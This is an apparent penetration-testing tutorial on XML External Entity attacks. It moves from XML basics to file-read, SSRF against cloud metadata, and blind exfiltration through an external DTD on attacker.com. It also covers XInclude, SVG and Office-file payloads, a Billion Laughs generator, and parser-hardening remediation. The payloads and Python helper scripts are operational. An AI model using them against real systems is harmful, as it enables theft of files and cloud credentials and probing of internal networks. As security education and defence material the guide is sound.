Step-by-step from XML basics to blind XXE exploitation, SSRF, and remediation. With analogies, payloads, and assessment guidance.
XML (eXtensible Markup Language) is a text format for storing and transporting structured data. Unlike HTML, it has no predefined tags — you invent your own.
    <?xml version="1.0" encoding="UTF-8"?>   <!-- XML declaration -->
    <order>                                   <!-- root element (exactly ONE) -->
      <customer id="42">                      <!-- element with attribute -->
        <name>Alice</name>
        <email>alice@example.com</email>
      </customer>
      <item qty="3">Widget</item>
    </order>
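As a minimal sketch of how an application might consume the document above, the snippet below reads it with Python's standard `xml.etree.ElementTree`. The variable names are illustrative and not part of the original example.

```python
import xml.etree.ElementTree as ET

# The order document from above, as bytes so the encoding declaration is honoured.
ORDER_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<order>
  <customer id="42">
    <name>Alice</name>
    <email>alice@example.com</email>
  </customer>
  <item qty="3">Widget</item>
</order>"""

root = ET.fromstring(ORDER_XML)           # the single root element
customer = root.find("customer")
customer_id = customer.get("id")          # attributes are always strings
name = customer.findtext("name")
item = root.find("item")
quantity = int(item.get("qty"))           # the application decides the type

print(root.tag, customer_id, name, item.text, quantity)
```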
A schema defines what's valid: which elements exist, what types they hold, what's required. Think of it as the blueprint the crate-builder must follow.
Formats: XSD (XML Schema Definition), DTD, RelaxNG.
A Document Type Definition (DTD) is an older schema format that lives either inside the XML document (internal DTD) or at a URL (external DTD). It defines allowed elements and declares entities — which is where XXE comes from.
    <!-- Internal DTD -->
    <!DOCTYPE note [
      <!ENTITY author "Alice">
    ]>
    <note>
      Written by &author;   <!-- → "Alice" -->
    </note>

    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd" >
    ]>
    <data>&xxe;</data>
    <!-- Parser fetches /etc/passwd and inlines it here -->
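Entity substitution is easy to observe locally. The sketch below feeds an internal-entity document to Python's standard `xml.etree.ElementTree` and prints the expanded text. Only the harmless internal case is shown, because handling of external entities differs between parsers and versions.

```python
import xml.etree.ElementTree as ET

# Internal entity declared in the DTD and referenced in the body.
NOTE_XML = """<!DOCTYPE note [
  <!ENTITY author "Alice">
]>
<note>Written by &author;</note>"""

note = ET.fromstring(NOTE_XML)

# The parser has already replaced &author; with the declared value.
print(note.text)
```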
| Entity Type | Syntax | Source | XXE Risk |
|---|---|---|---|
| Internal | <!ENTITY name "value"> | Literal string in DTD | Low |
| External (file) | <!ENTITY name SYSTEM "file:///..."> | Local filesystem | Critical |
| External (HTTP) | <!ENTITY name SYSTEM "http://..."> | Remote URL | SSRF |
| Parameter entity | <!ENTITY % name SYSTEM "..."> | Used inside DTD only | Blind XXE |
| Character entity | &lt; &amp; | Built-in XML escaping | None |
XXE is relevant wherever an application parses XML that the attacker influences. It's easy to miss because XML is often hidden.
- Content-Type: text/xml)
- application/xml
- Content-Type to XML and re-send
- Content-Type headers

XXE exists because most XML parsers support external entities by default. It's a feature, not a bug, until untrusted input hits it.
User-controlled data arrives as XML — directly in the body, inside a SOAP envelope, or embedded in a file upload.
The XML parser (libxml2, Xerces, .NET XmlDocument, Java SAXParser, etc.) sees a <!DOCTYPE> declaration and — by default — processes it.
The parser fetches the external resource (file, URL) and substitutes it into the document tree.
If the application reflects parsed values (e.g., echoes back a field), the attacker sees the file contents. If not → Blind XXE path.
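The four steps above can be reproduced in a few lines. The following is a deliberately unsafe sketch, assuming Python's `xml.parsers.expat` with a hand-written resolver that handles only `file://` identifiers. The function name and the throwaway `secret.txt` file are hypothetical. It mimics what a parser with external entities enabled does internally and is not how any particular library is implemented.

```python
import tempfile
import urllib.parse
import urllib.request
from pathlib import Path
from xml.parsers import expat


def parse_like_a_vulnerable_parser(xml_text):
    """Return the document's text content, resolving external entities (unsafe)."""
    chunks = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append

    def resolve_external_entity(context, base, system_id, public_id):
        # Step 3: fetch whatever the SYSTEM identifier points at (file:// only here).
        path = urllib.request.url2pathname(urllib.parse.urlparse(system_id).path)
        data = Path(path).read_bytes()
        # Substitute the fetched bytes into the document via a child parser.
        child = parser.ExternalEntityParserCreate(context)
        child.CharacterDataHandler = chunks.append
        child.Parse(data, True)
        return 1  # non-zero tells expat to carry on

    parser.ExternalEntityRefHandler = resolve_external_entity
    parser.Parse(xml_text, True)
    return "".join(chunks)


# Demo against a throwaway file instead of a real system file.
with tempfile.TemporaryDirectory() as tmp:
    secret = Path(tmp) / "secret.txt"
    secret.write_text("root:x:0:0:demo\n")
    payload = (
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{secret.as_uri()}"> ]>'
        "<data>&xxe;</data>"
    )
    leaked = parse_like_a_vulnerable_parser(payload)

print(leaked)  # step 4: an application echoing this value discloses the file
```

Removing the `ExternalEntityRefHandler` assignment is the equivalent of the hardened configuration: the reference is then no longer resolved.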
- /etc/passwd, app configs, SSH keys, source code
- 169.254.169.254)
- expect:// wrapper
- <, >, & break XML parsing → need out-of-band or CDATA tricks
- SYSTEM keyword or <!DOCTYPE

The classic flow: inject a DOCTYPE, define an external entity pointing to a local file, reference it in a value the app echoes back.
Look for a field value in the response that mirrors something you sent. E.g., <username>Alice</username> → response contains "Alice".
Prepend (or replace) the DOCTYPE to declare your entity.
Put &xxe; where the echoed value was.
The file contents appear where the entity was referenced.
    <?xml version="1.0"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <stockCheck>
      <productId>&xxe;</productId>   <!-- reflected field -->
      <storeId>1</storeId>
    </stockCheck>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
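When many requests need the same treatment, the manual steps can be scripted. The sketch below is one possible helper, assuming the reflected value appears as element text. The function name, the captured body, the product ID `381`, and the endpoint URL are all hypothetical. The request object is only constructed, never sent.

```python
import urllib.request


def build_classic_xxe(original_body, reflected_value, file_uri="file:///etc/passwd"):
    """Insert a DOCTYPE and swap the reflected element text for &xxe;."""
    doctype = f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{file_uri}"> ]>'
    # Replace only the first element whose text equals the reflected value.
    body = original_body.replace(f">{reflected_value}<", ">&xxe;<", 1)
    # The DOCTYPE has to sit after the XML declaration and before the root element.
    if body.startswith("<?xml"):
        decl_end = body.index("?>") + 2
        return f"{body[:decl_end]}\n{doctype}{body[decl_end:]}"
    return f"{doctype}\n{body}"


# Hypothetical captured request body.
captured = (
    '<?xml version="1.0"?>\n'
    "<stockCheck><productId>381</productId><storeId>1</storeId></stockCheck>"
)
payload = build_classic_xxe(captured, "381")

# Hypothetical endpoint; send only against systems you are authorised to test.
request = urllib.request.Request(
    "https://target.example/product/stock",
    data=payload.encode("utf-8"),
    headers={"Content-Type": "application/xml"},
    method="POST",
)
print(payload)
```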
Other useful file targets:
| File | What you get |
|---|---|
| /etc/passwd | User list, shells; confirms XXE works |
| /etc/hostname | Machine name; useful for SSRF targeting |
| /proc/self/environ | Environment variables; often contains secrets |
| /proc/self/cmdline | Running process & args |
| ~/.ssh/id_rsa | Private SSH key |
| /var/www/html/config.php | App source, DB credentials |
| C:\Windows\win.ini | Windows confirmation payload |
| file:///C:/inetpub/wwwroot/web.config | IIS config, connection strings |
Instead of file://, use http://. The server's XML parser makes an outbound HTTP request — from inside the network. You can probe internal services, cloud metadata APIs, or anything the server can reach.
    <!DOCTYPE foo [
      <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
    ]>
    <data>&ssrf;</data>

    <!-- Try systematically; timing difference reveals open vs. closed -->
    <!DOCTYPE foo [
      <!ENTITY ssrf SYSTEM "http://192.168.1.1:8080/">
    ]>
    <data>&ssrf;</data>
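Trying ports systematically is easier with a small generator. The sketch below only builds the payloads and flags timing outliers. Sending the requests is left to your usual tooling. The helper names, the factor of 3, and the sample timings are made up for illustration, and real thresholds depend on the target.

```python
import statistics


def ssrf_probe_payloads(host, ports):
    """Yield (port, payload) pairs, one XXE-based SSRF probe per port."""
    for port in ports:
        yield port, (
            f'<!DOCTYPE foo [ <!ENTITY ssrf SYSTEM "http://{host}:{port}/"> ]>'
            "<data>&ssrf;</data>"
        )


def timing_outliers(timings, factor=3.0):
    """Return ports whose response time differs from the median by more than `factor`."""
    baseline = statistics.median(timings.values())
    return sorted(
        port
        for port, seconds in timings.items()
        if seconds > baseline * factor or seconds * factor < baseline
    )


probes = dict(ssrf_probe_payloads("192.168.1.1", [22, 80, 5432, 8080]))

# Invented response times in seconds, purely to exercise the helper.
sample_timings = {22: 0.05, 80: 0.04, 8080: 0.06, 5432: 2.1}
suspicious = timing_outliers(sample_timings)
print(suspicious)
```

Whether a slow or a fast response indicates an open port varies with the parser and network, so an outlier is a hint to investigate, not a verdict.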
- 169.254.169.254 (AWS/GCP/Azure metadata)
- http://localhost:8080 (admin panels)
- http://internal-db:5432 (databases)
- http://elasticsearch:9200/_cat/indices
- http://kubernetes.default.svc (k8s API)

When the application processes XML but never reflects values back, you need out-of-band channels. The payload triggers an outbound connection to a server you control, proving the vulnerability and potentially exfiltrating data.
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "http://YOUR.COLLABORATOR.ID.oastify.com/">
    ]>
    <data>&xxe;</data>
    <!-- If Collaborator gets a DNS/HTTP hit → XXE confirmed blind -->
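The XML specification does not allow a parameter entity reference inside a markup declaration in the internal DTD subset, so the exfiltration URL cannot be assembled there. Instead, host a malicious DTD on your server and fetch it with a parameter entity.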
    <!DOCTYPE foo [
      <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
      %dtd;
    ]>
    <data>anything</data>
    <!-- evil.dtd, hosted on attacker.com -->
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?x=%file;'>">
    %exfil;
    %send;
Characters such as < > & break the URL. Wrap with CDATA: use a second parameter entity to construct <![CDATA[ around the file read, or use DNS exfil (hex-encode the data as subdomains).

    <!-- Error-based variant, also placed in the external DTD -->
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % error "<!ENTITY &#x25; boom SYSTEM 'file:///nonexistent/%file;'>">
    %error;
    %boom;
    <!-- Parser error message contains the file path including the file contents; visible in 500 error response -->
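For the DNS exfiltration option mentioned above, the listener has to reassemble hex-encoded chunks that arrive as subdomain labels, possibly out of order. The sketch below assumes a made-up naming scheme of `<sequence>.<hex chunk>.<domain>` and keeps each label under the 63-character DNS limit. How the data gets hex-encoded on the target is outside this sketch, since plain XML entities cannot transform content. The encoder is included only so the decoder can be tested.

```python
import random


def to_dns_names(data, domain, label_len=60):
    """Split hex-encoded data into query names: <seq>.<hex chunk>.<domain>."""
    hex_data = data.hex()
    chunks = [hex_data[i:i + label_len] for i in range(0, len(hex_data), label_len)]
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]


def from_dns_names(names, domain):
    """Reassemble the original bytes from logged query names in any order."""
    suffix = "." + domain
    parts = {}
    for name in names:
        if not name.endswith(suffix):
            continue  # unrelated DNS traffic
        seq, chunk = name[: -len(suffix)].split(".", 1)
        parts[int(seq)] = chunk
    return bytes.fromhex("".join(parts[i] for i in sorted(parts)))


original = b"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
queries = to_dns_names(original, "attacker.com")
random.shuffle(queries)  # DNS gives no ordering guarantee
recovered = from_dns_names(queries + ["www.example.org"], "attacker.com")
print(recovered.decode())
```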
Sometimes you can't inject a DOCTYPE — because you control only part of the XML (e.g., a value inside a SOAP message), or the server regenerates the DOCTYPE. Two alternatives:
    <!-- No DOCTYPE needed. XInclude uses a namespace. -->
    <foo xmlns:xi="http://www.w3.org/2001/XInclude">
      <xi:include parse="text" href="file:///etc/passwd"/>
    </foo>
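To see what "server supports XInclude processing" means in practice, the sketch below runs the standard library's `xml.etree.ElementInclude` over a document of the same shape. It assumes a throwaway file with invented contents. Note that this particular loader takes a plain filesystem path in `href`, not a `file://` URI, and other processors behave differently.

```python
import tempfile
from pathlib import Path
from xml.etree import ElementInclude
from xml.etree import ElementTree as ET

with tempfile.TemporaryDirectory() as tmp:
    # Stand-in for a sensitive file; contents are invented for the demo.
    target = Path(tmp) / "secret.txt"
    target.write_text("db_password=hunter2\n")

    doc = ET.fromstring(
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include parse="text" href="{target}"/>'
        "</foo>"
    )

    # This call is the server-side step that makes the attack possible:
    # it replaces every xi:include element with the referenced content.
    ElementInclude.include(doc)
    included = doc.text

print(included)
```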
parse="text" is key: without it, the parser tries to parse the file as XML.

    <?xml version="1.0"?>
    <!DOCTYPE svg [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <svg xmlns="http://www.w3.org/2000/svg">
      <text y="20">&xxe;</text>
    </svg>
    <!-- Upload as .svg / image/svg+xml.
         Content may appear rendered in browser or in response if fetched directly -->
| Scenario | Technique | Requirement |
|---|---|---|
| Full XML body control | Classic DOCTYPE injection | Parser allows external entities |
| Control a value inside XML | XInclude | Server supports XInclude processing |
| File upload (image) | SVG with DOCTYPE | Server parses SVG as XML |
| DOCX/XLSX upload | Modify embedded XML parts | Server opens/processes the file |
| JSON that becomes XML | Content-Type swap + classic | Backend converts JSON→XML |
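The DOCX/XLSX row can be sketched with the standard `zipfile` module, since Office files are ZIP archives of XML parts. The helper name, the `MARKER` placeholder, and the stand-in archive below are hypothetical. The demo archive is not a valid Word document, and in a real test you would start from a genuine file and pick a part the server is likely to parse.

```python
import io
import zipfile

DOCTYPE = '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'


def inject_into_office_file(archive, part, marker):
    """Return a copy of the archive with a DOCTYPE and &xxe; added to one XML part."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == part:
                xml = data.decode("utf-8")
                # Keep the XML declaration first, then the DOCTYPE.
                decl_end = xml.index("?>") + 2 if xml.startswith("<?xml") else 0
                xml = xml[:decl_end] + DOCTYPE + xml[decl_end:]
                data = xml.replace(marker, "&xxe;", 1).encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()


# Stand-in archive with two parts, built in memory for the demo.
original = io.BytesIO()
with zipfile.ZipFile(original, "w") as z:
    z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
    z.writestr(
        "word/document.xml",
        '<?xml version="1.0"?><w:document xmlns:w="urn:demo"><w:t>MARKER</w:t></w:document>',
    )

modified = inject_into_office_file(original.getvalue(), "word/document.xml", "MARKER")
with zipfile.ZipFile(io.BytesIO(modified)) as z:
    injected_part = z.read("word/document.xml").decode("utf-8")
    untouched_part = z.read("[Content_Types].xml").decode("utf-8")
print(injected_part)
```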
For blind XXE exfiltration in real engagements, you need an attacker-controlled server for hosting external DTDs and receiving callbacks. Here's a practical workflow using typical ERNW tooling.
    # Minimal Python HTTP server that logs all requests
    python3 -m http.server 80

    # Or with explicit request logging (redirect stdout to a file if needed):
    python3 -c "
    import http.server
    class L(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            print(f'[HIT] {self.path}', flush=True)
            self.send_response(200)
            self.end_headers()
    http.server.HTTPServer(('', 80), L).serve_forever()
    "
    # Listen for DNS queries (your NS for attacker.com must point here)
    tcpdump -i eth0 -n udp port 53 | grep attacker.com

    # Or use interactsh-client (open source Burp Collaborator alternative)
    interactsh-client -v
    # gives you: abc123.oast.fun (use as your callback domain)
| Tool | Use Case | Notes |
|---|---|---|
| Burp Suite Pro | Intercept, modify, replay XML; Collaborator for blind OOB | Go-to for manual XXE |
| Burp Collaborator | DNS/HTTP callback server, auto-correlated | Built into Burp Pro; use oastify.com domains |
| interactsh | Open-source Collaborator alternative | interactsh-client CLI |
| XXEinjector | Automated XXE file enumeration & OOB exfil | Ruby; good for bulk file reads |
| xmllint | Parse & test DTD structure locally | xmllint --noent payload.xml |
| Python requests | Scripted payload delivery | Set Content-Type: application/xml |
Place evil.dtd on your C&C server. It reads the target file and sends its contents to your listener as a URL parameter.
XML body references http://c2.attacker.com/evil.dtd via a parameter entity. Target fetches the DTD.
Your listener receives GET /?data=root:x:0:0:...%0Adaemon:.... URL-decode the parameter to get the file.
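The DTD hosting and the decoding of the callback can both be scripted. The sketch below renders an `evil.dtd` for a given target file and decodes a logged request path. The function names are hypothetical, and the `data` parameter name follows the callback shown above. Content containing `&` would be split by the query-string parser, so treat the decoder as a starting point.

```python
from urllib.parse import parse_qs, urlsplit


def render_evil_dtd(target_file, callback_base):
    """Return the text of an external DTD that sends target_file to callback_base."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        # &#x25; is the escaped percent sign needed for the nested declaration.
        f'<!ENTITY % exfil "<!ENTITY &#x25; send SYSTEM \'{callback_base}/?data=%file;\'>">\n'
        "%exfil;\n"
        "%send;\n"
    )


def decode_hit(request_path):
    """Extract and URL-decode the 'data' parameter from a logged request path."""
    values = parse_qs(urlsplit(request_path).query).get("data", [""])
    return values[0]


dtd_text = render_evil_dtd("/etc/passwd", "http://c2.attacker.com")
print(dtd_text)

# Example of a path as it might appear in the listener log.
logged_path = "/?data=root:x:0:0:root%0Adaemon:x:1:1"
file_contents = decode_hit(logged_path)
print(file_contents)
```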
ruby XXEinjector.rb --host=c2.attacker.com --file=/burp_request.txt --path=/etc/ --oob=http
Configure your XML parser to reject external entities and DTD processing. This is the direct fix.
Prefer JSON or YAML for APIs. Less attack surface, no entity concept. Only use XML where necessary.
Validate that XML conforms to expected schema before parsing. Reject documents with DOCTYPE declarations unless required.
XML parser libraries regularly patch XXE-related issues. Run npm audit, OWASP Dependency-Check (e.g. mvn org.owasp:dependency-check-maven:check), or an equivalent tool regularly.
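Rejecting documents that carry a DOCTYPE can be done as a cheap pre-check before the real parser runs. The sketch below is one way to do it with the standard `xml.parsers.expat` module. The exception class and function name are hypothetical, and it complements a hardened parser configuration without replacing it.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when an incoming document contains a DOCTYPE declaration."""


def reject_doctype(xml_bytes):
    """Raise DoctypeForbidden if the document declares a DOCTYPE."""
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort as soon as the declaration is seen, before any entity is used.
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    # No external entity handler is installed, so nothing is fetched here.
    parser.Parse(xml_bytes, True)


samples = {
    "clean": b"<order><item>1</item></order>",
    "xxe": b'<!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]><foo>&x;</foo>',
}
results = {}
for label, document in samples.items():
    try:
        reject_doctype(document)
        results[label] = "accepted"
    except DoctypeForbidden:
        results[label] = "rejected"
print(results)
```

Malformed input surfaces as `expat.ExpatError`, which a caller would normally treat as a rejection as well.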
| Language / Parser | Safe Configuration |
|---|---|
| Java (SAXParser) | factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) |
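| Java (DocumentBuilder) | factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true), plus factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true) (secure processing alone may not block external entities) |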
| Python (lxml) | etree.XMLParser(resolve_entities=False, no_network=True) |
| Python (defusedxml) | Drop-in safe replacement: import defusedxml.ElementTree as ET |
| .NET (XmlReader) | XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit } |
| PHP (libxml) | libxml_disable_entity_loader(true) (PHP < 8.0; disabled by default in 8.0+) |
| Node.js (node-expat / libxmljs) | Check for resolve_entities: false; prefer sax or validated parsers |
| Ruby (Nokogiri) | Keep Nokogiri::XML::ParseOptions::NONET set and leave NOENT unset (NOENT turns entity substitution on) |
    # pip install defusedxml
    import defusedxml.ElementTree as ET

    # Any XXE/XInclude/entity bomb attempt raises an exception
    tree = ET.parse("user_input.xml")   # safe drop-in
    root = tree.getroot()
    SAXParserFactory factory = SAXParserFactory.newInstance();
    factory.setFeature(
        "http://apache.org/xml/features/disallow-doctype-decl", true
    );
    factory.setFeature(
        "http://xml.org/sax/features/external-general-entities", false
    );
    factory.setFeature(
        "http://xml.org/sax/features/external-parameter-entities", false
    );
    SAXParser parser = factory.newSAXParser();
cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html: comprehensive parser-by-parser reference.

| Goal | Payload Skeleton |
|---|---|
| Read local file (inline) | <!ENTITY x SYSTEM "file:///etc/passwd"> … &x; |
| SSRF / internal HTTP | <!ENTITY x SYSTEM "http://169.254.169.254/..."> |
| Blind OOB ping | <!ENTITY x SYSTEM "http://collaborator.id/"> |
| Blind OOB + file exfil | Parameter entity → external evil.dtd → %file; in URL |
| Error-based | %file; used in invalid path → error message leaks content |
| XInclude (no DOCTYPE) | <xi:include parse="text" href="file:///etc/passwd"/> |
| SVG upload | SVG with DOCTYPE + <text>&xxe;</text> |
| DoS (Billion Laughs) | Nested entities: &lol9; expands to 10^9 copies of "lol" |
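The arithmetic behind the Billion Laughs row is worth spelling out: nine levels of entities, each referencing the previous one ten times, turn a payload of about a kilobyte into 10^9 copies of "lol". The sketch below builds the declarations and computes the expanded size without ever parsing them. The function name is hypothetical.

```python
def billion_laughs(depth=9, fanout=10, seed="lol"):
    """Return (payload, copies): the XML text and how many seeds &lol<depth>; expands to."""
    declarations = [f'<!ENTITY lol "{seed}">']
    previous = "lol"
    for level in range(1, depth + 1):
        name = f"lol{level}"
        references = f"&{previous};" * fanout   # each level repeats the one below
        declarations.append(f'<!ENTITY {name} "{references}">')
        previous = name
    payload = (
        "<!DOCTYPE lolz [\n  " + "\n  ".join(declarations) + "\n]>\n"
        f"<lolz>&{previous};</lolz>"
    )
    return payload, fanout ** depth


payload, copies = billion_laughs()
expanded_bytes = copies * len("lol")

print(f"payload size : {len(payload)} bytes")
print(f"copies       : {copies}")
print(f"expanded size: {expanded_bytes / 1e9:.1f} GB")
```

Do not feed the generated payload to a parser outside an isolated test environment.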